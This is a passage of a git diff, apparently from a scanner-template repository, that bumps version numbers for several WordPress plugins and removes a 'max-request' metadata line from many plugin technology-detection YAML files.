 http/technologies/wordpress/plugins/ninja-forms.yaml           | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml           | 1 -
 .../wordpress/plugins/official-facebook-pixel.yaml             | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml          | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml          | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml    | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml          | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml         | 1 -
 http/technologies/wordpress/plugins/polylang.yaml              | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml         | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml           | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml             | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml      | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml        | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml           | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml     | 1 -
 http/technologies/wordpress/plugins/redirection.yaml           | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml       | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml              | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml      | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml         | 3 +--
 http/technologies/wordpress/plugins/sg-security.yaml           | 3 +--
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml   | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml          | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml            | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml             | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml     | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml        | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml     | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml        | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml           | 1 -
 .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml            | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml  | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml   | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml   | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml      | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml         | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml       | 1 -
 .../wordpress/plugins/under-construction-page.yaml             | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml           | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml          | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml      | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml            | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml        | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml            | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml          | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml            | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml       | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml       | 1 -
 .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml   | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml          | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml  | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml         | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml        | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml  | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml             | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml    | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml         | 1 -
 http/technologies/wordpress/plugins/worker.yaml                | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml      | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml   | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml              | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml       | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml        | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml          | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml        | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml           | 1 -
 208 files changed, 10 insertions(+), 210 deletions(-)

diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt
index b0f61c56dd..0c9cb69569 100644
--- a/helpers/wordpress/plugins/admin-menu-editor.txt
+++ b/helpers/wordpress/plugins/admin-menu-editor.txt
@@ -1 +1 @@
-1.11.1
\ No newline at end of file
+1.11.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt
index a423d4217b..8a0feb98ca 100644
--- a/helpers/wordpress/plugins/astra-sites.txt
+++ b/helpers/wordpress/plugins/astra-sites.txt
@@ -1 +1 @@
-3.4.2
\ No newline at end of file
+3.4.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt
index 6a79ddb31f..4986c931ad 100644
--- a/helpers/wordpress/plugins/pixelyoursite.txt
+++ b/helpers/wordpress/plugins/pixelyoursite.txt
@@ -1 +1 @@
-9.4.5.1
\ No newline at end of file
+9.4.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
index 7491cf3bcc..4843910948 100644
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@@ -1 +1 @@
-4.10.9
\ No newline at end of file
+4.10.10
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt
index 6b0e58e78f..cb1d6217e1 100644
--- a/helpers/wordpress/plugins/sg-cachepress.txt
+++ b/helpers/wordpress/plugins/sg-cachepress.txt
@@ -1 +1 @@
-7.4.1
\ No newline at end of file
+7.4.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/sg-security.txt b/helpers/wordpress/plugins/sg-security.txt
index 03e5161d2c..7b5753f55b 100644
--- a/helpers/wordpress/plugins/sg-security.txt
+++ b/helpers/wordpress/plugins/sg-security.txt
@@ -1 +1 @@
-1.4.5
\ No newline at end of file
+1.4.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt
index 4be2c727ad..3d5762e858 100644
--- a/helpers/wordpress/plugins/woocommerce-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-payments.txt
@@ -1 +1 @@
-6.5.0
\ No newline at end of file
+6.5.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
index 7e541aec69..a6254504e4 100644
--- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt
@@ -1 +1 @@
-2.2.2
\ No newline at end of file
+2.3.1
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
